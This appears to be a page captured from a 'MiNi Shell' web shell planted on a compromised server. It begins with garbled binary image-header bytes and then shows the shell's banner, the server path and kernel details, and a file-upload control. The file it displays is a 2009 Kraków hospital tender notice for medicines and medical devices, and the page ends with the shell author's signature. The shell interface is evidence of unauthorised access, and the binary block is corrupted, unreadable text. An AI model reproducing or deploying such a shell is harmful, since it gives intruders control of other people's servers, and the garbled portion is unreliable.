JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090119/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090119/20551-N-2009.html

<p class="kh_header"><b>Kraków: ZP/4/2009</b><br>
<b>Numer ogłoszenia: 20551 - 2009; data zamieszczenia: 19.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szpital Specjalistyczny im. J. Dietla , ul. Skarbowa 4, 31-121 Kraków, woj. małopolskie, tel. 012 6876330, faks 012 6876331.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.dietl.krakow.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b>  Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ZP/4/2009.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> III.	OPIS PRZEDMIOTU ZAMÓWIENIA
	
1.	Przedmiotem zamówienia jest dostawa  produktów leczniczych i wyrobów medycznych, produktów leczniczych wykazanych w następujących pakietach:
.	Pakiet 3-6  produkty lecznicze - CPV - - 33600000-6 ,
.	Pakiet 1-2  - wyroby medyczne  -  CPV - 33141620-2 , 33141000-0, 

2.	Zamawiający dopuszcza udział podwykonawców w realizacji zamówienia w części dotyczącej transportu przedmiotu zamówienia do siedziby Zamawiającego (art. 36 ust. 4 PZP).
3.	Zakres rzeczowy zamówienia określa załącznik nr 2 do SIWZ..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 33.60.00.00-6, 33.14.16.20-2, 33.14.10.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 3.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiajacy nie wymaga wpłaty wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> VII.	WYMAGANE WARUNKI DOPUSZCZAJĄCE WYKONAWCÓW DO UDZIAŁU W POSTĘPOWANIU ORAZ SPOSÓB DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW
1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki określone w art. 22 ust. 1 PZP oraz nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ust.1 i 2 PZP.
2.	Spełnienie wymogów, podanych w ust. 1, należy potwierdzić poprzez złożenie stosownego oświadczenia według załącznika nr 3 do SIWZ oraz poprzez przedłożenie dokumentów, o których mowa w rozdziale VIII.SIWZ.
3.	Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana według formuły spełnia - nie spełnia . Nie spełnienie chociażby jednego warunku, skutkować będzie zgodnie z art. 24 ust. 2 pkt 3PZP wykluczeniem Wykonawcy z postępowania (odrzuceniem jego oferty), z zastrzeżeniem art.26 ust.3 PZP.
4.	Zgodnie z art. 26 ust.3 PZP Zamawiający wezwie Wykonawców, którzy w określonym terminie nie złożyli wymaganych przez Zamawiającego oświadczeń i dokumentów oraz pełnomocnictw, o których mowa w rozdziale VIII  SIWZ, albo złożyli dokumenty zawierające błędy lub złożyli wadliwe pełnomocnictwa, do ich przedłożenia w wyznaczonym terminie, chyba, że mimo ich uzupełnienia oferta Wykonawcy podlega odrzuceniu lub konieczne byłoby unieważnienie postępowania. Złożone na wezwanie Zamawiającego oświadczenia i dokumenty powinny potwierdzać spełnianie przez Wykonawcę warunków udziału w postępowaniu oraz spełnianie przez oferowaną dostawę wymagań określonych przez Zamawiającego, nie później niż w dniu, w którym upłynął termin składania ofert.

VIII.	WYKAZ OŚWIADCZEŃ I DOKUMENTÓW, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIENIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU

1.	oświadczenie określone w art. 22 ust. 1 oraz w art. 24 ust. 1 i 2 PZP, zgodnie z załącznikiem nr 3 do SIWZ,
2.	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie 
do ewidencji działalności gospodarczej - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
3.	stosowne dokumenty zezwalające na obrót wyrobami medycznymi i produktami leczniczymi - zezwolenie na prowadzenie hurtowni farmaceutycznej, 
4.	oświadczenie Wykonawcy o posiadaniu atestów, świadectw rejestracji, certyfikatów i innych dokumentów dopuszczających przedmiot zamówienia do obrotu na terenie RP, zgodnie z ustawą z dnia 6.09.2001r. Prawo farmaceutyczne ( Dz. U. z 2004 r. nr 53, poz. 533 z póź. zm.) oraz ustawą o wyrobach medycznych (Dz. U. z 2007 r. nr 64 poz.565,Nr 176 poz.1238.)
5.	informacja banku, w którym Wykonawca posiada podstawowy rachunek bankowy, potwierdzająca wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy w wysokości równej wartości poszczególnych pakietów, a jeżeli oferta jest składana na więcej niż jeden pakiet równą sumie wartości tych pakietów - wystawiona nie wcześniej niż 3 miesiące przez upływem terminu składania ofert,
     6.   polisa lub inny dokument ubezpieczenia potwierdzający, że Wykonawca jest aktualnie  
           ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności  
           gospodarczej.
     7.   Zamawiający wymaga dostarczenia próbek razem z ofertą do pakietu nr 1,2.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> IX.	WYMAGANIA DOTYCZĄCE OFERTY SKŁADANEJ PRZEZ WYKONAWCÓW

1. Na ofertę składają się (spięte w kolejności jak podano niżej):
1)	wypełniony formularz oferty, zgodnie z załącznikiem nr 1 do SIWZ,
2)	oświadczenia i dokumenty jakie mają dostarczyć wykonawcy w celu potwierdzenia spełnienia warunków udziału w postępowaniu (zgodnie z punktem VIII SIWZ).
2. Dokumenty, o których mowa powyżej, mogą być przedstawione w formie oryginału lub kserokopii poświadczonej i opatrzonej klauzulą za zgodność z oryginałem  przez Wykonawcę (tj. osoby wymienione w rejestrze lub zaświadczeniu o wpisie do ewidencji działalności gospodarczej, posiadające umocowania prawne do reprezentowania Wykonawcy). Dokument wielostronicowy przedłożony w formie kserokopii winien być potwierdzony za zgodność z oryginałem na każdej stronie. Dokumenty na formularzach stanowiących załączniki do SIWZ powinny być sporządzone według wzorów określonych przez Zamawiającego. 
3. Złożenie dokumentu w niewłaściwej formie (np. nie poświadczone przez Wykonawcę za zgodność z oryginałem odpisy lub kopie) traktowane będzie jak jego brak.
4. W przypadku, gdy Wykonawcę reprezentuje pełnomocnik, do oferty należy dołączyć pełnomocnictwo, z którego wynika jego zakres, podpisane przez osoby uprawnione do reprezentowania Wykonawcy. W przypadku załączenia kserokopii pełnomocnictwa, winno ono być poświadczone za zgodność z oryginałem.
5. Zamawiający zażąda przedstawienia oryginału lub notarialnie potwierdzonej kopii dokumentu wtedy, gdy przedstawiona przez Wykonawcę kserokopia dokumentu będzie nieczytelna lub będzie budzić wątpliwości, co do jej prawdziwości.
6. Żadne dokumenty wchodzące w skład oferty, w tym również przedstawione w formie oryginałów nie podlegają zwrotowi przez Zamawiającego.

X.	OFERTA SKŁADANA PRZEZ WYKONAWCĘ, KTÓRY MA SIEDZIBĘ LUB MIEJSCE ZAMIESZKANIA POZA TERYTORIUM RP

1.	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium RP, zamiast dokumentów, o których mowa w rozdziale VIII ust.2 SIWZ składa dokument lub dokumenty potwierdzające odpowiednio, że nie otwarto jego likwidacji, ani nie ogłoszono upadłości, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
2.	Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w rozdziale VIII ust.2 SIWZ, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego, odpowiedniego dla kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.

XI.	OFERTA SKŁADANA PRZEZ SPÓŁKĘ CYWILNĄ
W przypadku składania oferty przez spółkę cywilną należy przedłożyć dokumenty, o których mowa w rozdziale VIII ust. 1 i 2 SIWZ, dla każdego ze wspólników tej spółki wraz z umową spółki oraz pełnomocnictwem do reprezentowania wspólników.



XII.	OFERTA SKŁADANA PRZEZ KONSORCJUM
1.	Wykonawcy tworzący konsorcjum, ubiegający się wspólnie o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania w postępowaniu, albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo należy dołączyć do oferty.
2.	W przypadku wyboru przez Zamawiającego oferty złożonej przez konsorcjum, Wykonawcy tworzący konsorcjum zobowiązani będą, najpóźniej przed podpisaniem umowy na wykonanie zamówienia, do przedłożenia umowy konsorcjum.
3.	Zamawiający bezwzględnie wymaga, aby umowa konsorcjum:
1)	określała sposób reprezentacji wszystkich podmiotów oraz upoważniała jednego z członków konsorcjum - głównego partnera (lidera) do koordynowania czynności związanych z realizacją umowy,
2)	stwierdzała o odpowiedzialności solidarnej partnerów konsorcjum, za całość podjętych zobowiązań w ramach realizacji przedmiotu zamówienia,
3)	oznaczała czas trwania konsorcjum obejmującego okres realizacji przedmiotu zamówienia oraz gwarancji jakości,
4)	określała cel gospodarczy obejmujący swoim zakresem przedmiot zamówienia, 
5)	wykluczała możliwość wypowiedzenia umowy konsorcjum przez któregokolwiek z jego członków do czasu wykonania zamówienia oraz upływu czasu gwarancji,
6)	określała sposób współdziałania podmiotów z określeniem podziału zadań w trakcie realizacji zamówienia,
7)	stwierdzała zakaz zmian w umowie bez zgody Zamawiającego. 
4.	Wszyscy członkowie konsorcjum ponoszą solidarnie odpowiedzialność prawną za realizację zamówienia. Problematykę zobowiązań solidarnych w zakresie nie uregulowanym przez umowę konsorcjum regulują przepisy kodeksu cywilnego.
5.	Oferta składana przez konsorcjum zostanie utworzona z dokumentów wymienionych w rozdziale VIII SIWZ z zastrzeżeniem, iż dokumenty wymienione w rozdziale VIII ust.1             i 2 składane są przez każdego z uczestników konsorcjum osobno.
6.	Ocena spełnienia przez konsorcjum warunków i wymogów określonych w rozdziale VII ust. 1 SIWZ będzie polegała na łącznej ocenie złożonych dokumentów.
7.	Oferta konsorcjum musi być podpisana i oznaczona w taki sposób, by prawnie zobowiązywała wszystkie podmioty wchodzące w skład konsorcjum. 


XV.	OPIS SPOSOBU OBLICZANIA CENY OFERTY I WARUNKI PŁATNOŚCI

1.	Ofertę cenową należy sporządzić w oparciu o tabelę stanowiącą załącznik nr 2 do SIWZ. Ceny brutto należy zaokrąglić do drugiego miejsca po przecinku wraz z zaokrągleniem i wyrazić w zł (0,00 dwa miejsca po przecinku). Cennik w poszczególnych pozycjach winien zawierać: ilość przedmiotu zamówienia, cenę jednostkową netto, cenę jednostkową brutto, stawkę podatku VAT oraz wartość netto i brutto pozycji. Wartość brutto musi wynikać z wartości netto powiększonej o stawkę podatku VAT. Każdy wyceniany pakiet należy podsumować licząc jego wartość netto i brutto.
2.	Opis sposobu obliczenia ceny oferty:
wartość netto zamówienia - cena jednostkowa netto x  ilość,
cena jednostkowa brutto - cena jednostkowa netto x stawka podatku VAT,
wartość brutto zamówienia - wartość netto powiększona o stawkę  podatku VAT. 
3.	Cena winna być ceną ostateczną - uwzględniającą wszelkie upusty i rabaty, które oferuje Wykonawca.
4.	Cena netto winna zawierać wszystkie składowe związane z dostawą do magazynu Zamawiającego: koszty transportu, koszty ubezpieczenia, koszty opakowania oraz wszelkie inne składowe uwzględniające upusty i rabaty, za wyjątkiem podatku VAT.
5.	Stawka podatku VAT winna być wyszczególniona w osobnej rubryce.
6.	Zamawiający podał w tabelach poszczególnych pakietów optymalne wielkości opakowań i wymagane ilości przedmiotu zamówienia. W przypadku zaoferowania przedmiotu zamówienia w opakowaniach o ilości innej niż żądana przez Zamawiającego, na Wykonawcy spoczywa obowiązek prawidłowego przeliczenia ilości opakowań. Np. Zamawiający podał wielkość opakowania - 1 op. x 20 tabletek i zapotrzebowanie - 400 opakowań, co daje sumaryczną ilość 8 000 tabletek, natomiast Wykonawca posiada opakowania - 1 op. x 40 tabletek, to w ofercie winien podać: 1 op. x 40 tabl. i zapotrzebowanie =  200 op. (8.000 /40 = 200).
7.	Oferty nie zawierające dokładnie żądanej ilości przedmiotu zamówienia będą odrzucane z braku możliwości porównania ich z innymi ofertami.
8.	Do porównania brana będzie pod uwagę wartość brutto zamówienia (całego pakietu).
9.	Płatności zostaną dokonane w terminie do 30 dni od daty otrzymania przez Zamawiającego od Wykonawcy prawidłowo wystawionej faktury VAT. Forma płatności - przelew.
10.	Za datę dokonania płatności przyjmuje się datę obciążenia rachunku Zamawiającego..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.dietl.krakow.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zamówienia Publiczne Szpitala Kraków ul.Skarbowa 4 III p  pok.325.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.01.2009 godzina 10:00, miejsce: Oferty należy składać na adres: Szpital Specjalistyczny im. J. Dietla ul. Skarbowa 4, 31-121 Kraków, pokój 307 (Kancelaria), III piętro, nie później niż do dnia 27.01 2009 r. do godz. 10:00.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> wyroby medyczne.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> wyroby medyczne sterylne-pakiet nr 1-2 (zał.nr 2 do SIWZ).</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.16.20-2, 33.14.10.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Produkty lecznicze.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Prodykty lecznicze obejmują pakiet  nr 3-6 (zał.nr 2 do SIWZ ).</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.60.00.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com